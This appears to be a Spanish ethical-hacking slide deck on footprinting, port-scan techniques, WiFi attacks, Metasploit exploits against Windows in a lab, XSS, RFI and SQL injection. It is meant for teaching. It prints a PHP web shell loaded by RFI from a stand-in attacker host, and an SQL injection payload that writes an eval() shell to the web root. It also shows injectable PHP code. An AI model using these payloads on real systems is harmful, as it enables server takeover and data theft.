Beruflich Dokumente
Kultur Dokumente
penetracin a sistemas
HACKING ETICO
Los hackers ticos son profesionales de la
seguridad que
aplican sus conocimientos de hacking con
fines
defensivos (y legales). Diremos hacker
siempre, pero hay que fijarse en el
contexto.
QUE ES UN HACKER
Experto en algn campo de la
informtica
Conocimientos profundos de
diversas Plataformas (Windows,
Unix, Linux, android).
Conocimientos de redes
Conocimientos de hardware y
software.
Pasos previos al
ATAQUE
1.Reconocimie
nto
. Pasivo
. Activo
2. Rastreo
(escaner)
3. Acceso
. Niveles del
Sistema
. Redes
. DOS
4. Mantener el
acceso
FOOTPRINTING
Obtencin de los perfiles de seguridad de una
organizacin haciendo uso de una
metodologa (footprinting).
El resultado del footprinting es un perfil
nico de la organizacin en cuanto a sus
redes (Internet / Intranet / Extranet /Wireless)
y sistemas.
FOOTPRINTING
1.- Obtener informacin inicial
whois
nslookup
2.- Localizar el rango de red
Traceroute
TIPOS DE ATAQUES
1.- Hacking WIFI
2.-DOS
3.-DDOS
4.-M.I.T
5.Envenenamiento
DNS
6.-Reverse Shell
7.-Port scaning
8.-Inyecciones
SQL
9.-R.F.I
10.-XSS
11.-Inyeccion de
comandos
arbitrarios
12.-Hijacking
13.-Cookie
poisoning
Hacking Wifi
Definiciones
BSSID
SSID
monitor
AP
STATION
DOS
IVS
Mode
WEP
WPA
Que Ataques
analizaremos?
Hacking WEP
Fake AP
Wifi DOS (A usuarios y
sobre saturacin de frecuencias)
Fake Ap
mtodo De
Ataque y contra Ataque
DOS (Denial of
service)
En redes Wifi
Deteccin y
Wardriving
Anlisis
Escaneo de
Puertos
El escaneo de puertos es el ataque
primario y mas comn utilizado en una
auditoria ya sea legal o ilegal.
Nos permite :
Explorar
Identificar
Comprender
Tcnicas
Tipo de
escaneo
Abiert
o
TCP
connect ()
Reverse
Ident
Medio
abiert
o
Silencio
so
Barrid
os
TCP SYN
TCP FIN
TCP echo
Zombie
scan
ACK Scan
UDP echo
Null Scan
TCP ACK
Xmas Scan
SYN/ACK
Scan
Fragmentacin
TCP
TCP SYN
ICMP
echo
Otro
s
UDP
scan
FTP
bounce
scan
TCP connect()
La mas comn de cualquier software de escaneo
de puertos
consiste en usar la llamada connect() de TCP
Intenta establecer conexin
Si conecta el puerto esta abierto
si no , el puerto esta cerrado
Si no contesta esta silencioso
Muy rpido e invasivo y llamativo en exceso.
* Miles de conexiones
*Logs
Comportamiento
TCP connect()
Hacker-------[SYN]------>[0]
Puerto
TCP
Victima OPEN
Hacker<-------[SYN/ACK]-------[0]
Puerto
TCP Victima OPEN
Hacker-------[ACK]------->[0] Puerto TCP
Victima OPEN
Hacker-------[SYN]------->[X] Puerto
Victima CLOSED
Hacker<-----[RST]-------[X]
Puerto
Victima CLOSED
TCP
TCP
TCP SYN
Tcnica conocida como Half-open scan, escaneo
medio abierto por excelencia
se enva un paquete SYN fingiendo establecer
una conexion y se espera la respuesta del Host,
si llega un paquete SYN/ACK
significa que esta abierto y no devolvemos la
contestacin ACK, devolvemos RST , esto para
evitar que se complete el inicio
de conexin y as burlar el registro del sistema
como intento de conexin
*Discreto
Comportamiento
TCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la
Victima
Hacker <---[SYN/ACK]--- [O] P. TCP abierto
en la Victima
Hacker ---[RST]---> [O] P. TCP abierto en la
Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado
en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima
ACK scan
Destinado a identificar aquellos puertos que
estn en estado silencioso de forma precisa
cuando un puerto esta en este estado o no.
Enva paquetes ACK con nmeros de secuencia y
confirmacin aleatorios.
si el puerto esta abierto, responder con un
paquete RST, pues no identificara la conexin
como suya
si el puerto esta cerrado responder RST pero si
no responde es que esta filtrado.
* Apoyo de un escaneo anterior
*Variable del ping si responde RST
esta vivo si no es in alcanzable.
*Identificar firewall bloqueando SYN.
Comportamiento
ACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto
en la Victima
Hacker <---[RST]--- [O] Puerto TCP abierto
en la Victima
Hacker ---[ACK]---> [X] Puerto TCP cerrado
en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima
Null scan
Similar al FIN, funciona del mismo modo,
enviando paquetes malformados, pero en
este caso con
los flags desactivados, si el puerto esta
cerrado nos responder con RST y En caso
de no recibir nada el puerto esta abierto o
silencioso.
Ciertos firewalls vigilan los paquetes de
finalizacin aqu hace lo que FIN no.
Comportamiento
Null scan
Hacker ---[ ]---> [O] Puerto TCP abierto en
la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la
Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado
en la Victima
La razn
POC
Analizar 2 tipos de
escaneo con la intencin de
evadir un firewall y obtener
informacin acerca de los
puertos abiertos.
Ataques MIT
1.
2.
3.
EXPLOTACION
Escner de
vulnerabilidades
Escner de
vulnerabilidades
EXPLOTACION
Metasploit
Windows Server 2003
Penetracin
Windows Server 2003
prueba de concepto
Puerto 445
1.
2.
3.
4.
ms08067
Crear usuario
Habilitar Escritorio Remoto
Cambiar la contrasea del Administrador
OBJETIVO
Mostrar el ataque de
penetracin a Windows server
2003 en un ambiente
controlado.
Metasploit
Windows Server 2008 R2
Metasploit
Windows Server 2008 R2
Numero de vulnerabilidad : ms09050
Encontrar el servidor verificando
versin de smb
Explotar la vulnerabilidad
Denegacin de servicios.
OBJETIVO
Mostrar el ataque de
Denegacin de servicios a
Windows server 2008 en un
ambiente controlado.
Metasploit
Windows XP SP3
Metasploit
Penetracin a Windows XP SP3
Prueba de concepto
Metasploit
Windows 7
Metasploit
Windows 7 Penetracin
Prueba de concepto
Ataques
WEB
Ataques
XSS
Ataques XSS
Ataques
XSS
Ataques XSS
Ataques RFI
Remote file
inclusion
vulnerabilidad que afecta nicamente a paginas
dinmicas programadas en PHP, consiste en enlazar
archivos ubicados en un servidor remoto.
RFI se aprovecha del uso irresponsable de las
funciones include y requiere, las cuales, debido al
limitado conocimiento del programador y
las pocas o nulas validaciones que realiza antes de
incluir una variable recibida por
parametro de URL, pueden ser aprovechadas por
usuarios maliciosos para incluir scripts
programados para explotar dicha vulnerabilidad.
Ataques RFI
Remote file
inclusion
http://www.victima.com/index.php?
http://www.victima.com/index.php?
nav=pagina1php
nav=pagina1php
http://www.victimacom/index.php?
http://www.victimacom/index.php?
nav=pagina2.php
nav=pagina2.php
<?php
<?php
print
print
system($_GET['comman
system($_GET['comman
d']);
d']);
?>
http://www.victima.com/index.php?
?>
http://www.victima.com/index.php?
nav=http://atacante.com/shell.txt&command=ls
nav=http://atacante.com/shell.txt&command=ls
Inyeccion
SQL
union all select "<?php
eval($_GET['exec']); ?
>",2,3,4into
outfile"/var/www/html/ex
ec.php"
Analicemos
este cdigo
<?php
$link = mysql_connect('127.0.0.1','root', 'pass');
mysql_select_db('ejemplo', $link);
$sql = mysql_query('select * from ejemplo where id='.
$_GET['id'], $link);
if(mysql_errno($link))
{ echo mysql_error($link);
exit;
}
while($row = mysql_fetch_assoc($sql))
{ echo $
row['id']."
".$row['titulo']."
".$row['contenido']."
".$row['parent'];
}?
>
Busqueda de
tablas.
Prueba de
concepto
OBJETIVO
Mostrar el ataque de inyeccin
SQL y la tcnica de intrusin de
SHELL en un ambiente
controlado.
EL
RESULTADO
llegando a una
conclusin
El
resultado.
GRACIAS